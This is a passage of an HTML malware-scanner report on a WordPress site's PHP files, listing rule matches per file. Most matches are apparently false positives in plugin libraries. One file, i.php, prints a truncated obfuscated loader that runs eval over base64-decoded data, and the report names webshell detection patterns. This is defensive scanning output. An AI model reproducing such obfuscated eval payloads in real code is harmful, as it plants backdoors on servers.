<span style="color: #0000BB">$cimg&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$desc&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$toolbar&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$subcats&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$html&nbsp;&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$pgn&nbsp;</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_155").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/download-manager/wpdm-widgets.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_156" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_topdls_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_newpacks_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_affiliate_widget");'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'widgets_init'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;register_widget("wpdm_search_widget");'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_156").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/i.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_157" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_157").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/easy-fancybox/inc/class-easyfancybox.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.18 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_158" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_key</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_158").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/libraries/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 185.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:45</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_159" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_159").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_160" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$e'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'trigger_error($e-&gt;getMessage(),&nbsp;E_USER_ERROR);'</span><span style="color: #007700">);&nbsp;}&nbsp;else{&nbsp;</span><span style="color: #0000BB">$exception_handler&nbsp;</span><span style="color: #007700">=&nbsp;function(</span><span style="color: #0000BB">$e</span><span style="color: #007700">){&nbsp;</span><span style="color: #0000BB">trigger_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$e</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">(),&nbsp;</span><span style="color: #0000BB">E_USER_ERROR</span><span style="color: #007700">);&nbsp;};&nbsp;}&nbsp;</span><span style="color: #0000BB">set_exception_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$exception_handler</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$option_name&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">'_Options'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$options_default&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">PMXI_Config</span><span style="color: #007700">::</span><span style="color: #0000BB">createFromFile</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">ROOT_DIR&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/config/options.php'</span><span style="color: #007700">)-&gt;</span><span style="color: #0000BB">toArray</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$options_default</span><span style="color: #007700">);&nbsp;require_once&nbsp;</span><span style="color: #0000BB">ABSPATH&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'w...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_160").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/classes/PHPExcel/Reader/Excel5.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 285.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_161" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_161").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/classes/PHPExcel/Helper/HTML.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 24.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_162" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">lave</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_162").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 209.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_163" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_163").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/OLERead.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_164" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_164").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/File.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_165" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_165").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/wp-all-import/helpers/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_166" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval&nbsp;(</span><span style="color: #DD0000">"return&nbsp;(</span><span style="color: #0000BB">$str</span><span style="color: #DD0000">);"</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$then&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$else</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'is_empty'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">is_empty</span><span style="color: #007700">(</span><span style="color: #0000BB">$var</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;empty(</span><span style="color: #0000BB">$var</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_human_filesize'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_human_filesize</span><span style="color: 